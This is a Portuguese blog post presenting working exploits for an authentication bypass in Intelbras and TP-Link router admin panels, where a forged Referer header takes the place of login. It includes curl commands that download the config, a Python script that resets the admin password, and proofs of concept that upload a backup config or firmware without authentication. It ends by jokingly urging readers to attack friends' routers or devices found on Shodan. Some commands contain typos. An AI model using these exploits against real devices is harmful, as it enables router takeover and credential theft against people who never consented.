As vulnerabilidades baseavam-se em conseguir alterar ou ver informações no painel do roteador somente estando na mesma rede que o dispositivo, informações que somente quem poderia ver seriam pessoas que estivessem autenticadas nessa área administrativa.

A aplicação não ignorava headers de autenticação, principalmente o `"Cookie: Authorization=Basic BASE64="` mas verificava apenas o `"Referer: http://ip.router/"`, pois para ela se o usuário estava vindo com esse header, ele certamente estaria autenticado na plataforma, isso abriu ### portas para um novo ataque.

**Ex:**

    curl -X GET http://192.168.0.1/cgi/conf.bin
    

Resposta: `HTTP/1.1 403 Forbidden`

    curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
    

Resposta: `HTTP/1.1 200 OK`

**Exemplo de alteração de senha do painel do roteador:**

    import requests
    
    new = input('New Pass: ')
    url = 'http://192.168.0.1/cgi?8'
    headers = {'Content-Type': 'text/plain',
     'Referer': 'http://192.168.0.1/mainFrame.htm'}
    
    data = ''
    data += '[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
    data += 'oldPwd=admin\x0d\x0a'
    data += 'name=admin\x0d\x0a'
    data += 'pwd='+new+'\x0d\x0a'
    
    r = requests.post(url,data=data,headers=headers)
    
    print(r.text)
    

**Novos firmwares velhas vulns.**

Atualizei minha firmware para a nova versão publicada no site do distribuidor, e decidi verificar se algo tinha mudado, e realmente o bug do `Referer` não estava mais lá, independente de `Referer` ou não, todas as requisições GET estavam sendo liberadas somente para quem tivesse o _cookie_ certo.

Mas ainda sobrou alguns lugares em que as alterações eram feitas via POST, que no caso seriam: Restaurar arquivos de backup e alterar ou atualizar a firmware.

Restaurando backup do modelo Intelbras, mesmo removendo o `Authorization: Basic` ainda conseguimos fazer o upload do arquivo:

![](https://i.imgur.com/xFI9Ulv.png)

Uma boa ideia para tentar, seria baixar um arquivo de backup do seu _router_ e subir o mesmo no _router_ do seu amigo:

**PoC:**

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin http://192.1680.1/incoming/RouterBakCfgUpload.cfg
    

O mesmo acontece com a opção de atualizar a firmware.

![](https://i.imgur.com/3bEJT2e.png)

**TP-Link:**

![](https://i.imgur.com/oedwA0w.png)

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F data=@conf.binhttp://192.168.0.2/cgi/confup
    

**Não façam isso em casa**

Por enquanto é só isso, atualizarei este post frequentemente caso tenham mais modelos e novos bugs para demonstrar, não tentem reproduzir essas peripécias em casa, tentem nos _routers_ de amigos ou no Shodan, é mais divertido 😉.

![rip](https://i.imgur.com/cirhrTd.jpg)

**Referencias**

*   XSS NO ROTEADOR INTELBRAS WRN 240
*   intelbras dns change csrf
*   TP-LINK: Derrubando painel administrador com 1 requisição (Sem autenticação)
*   POC Router
*   TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass
*   Exploit Database Advanced Search - Title: TP-Link

Common Vulnerabilities and Exposures , Pentest , Proof of Concept

Tag

#csrf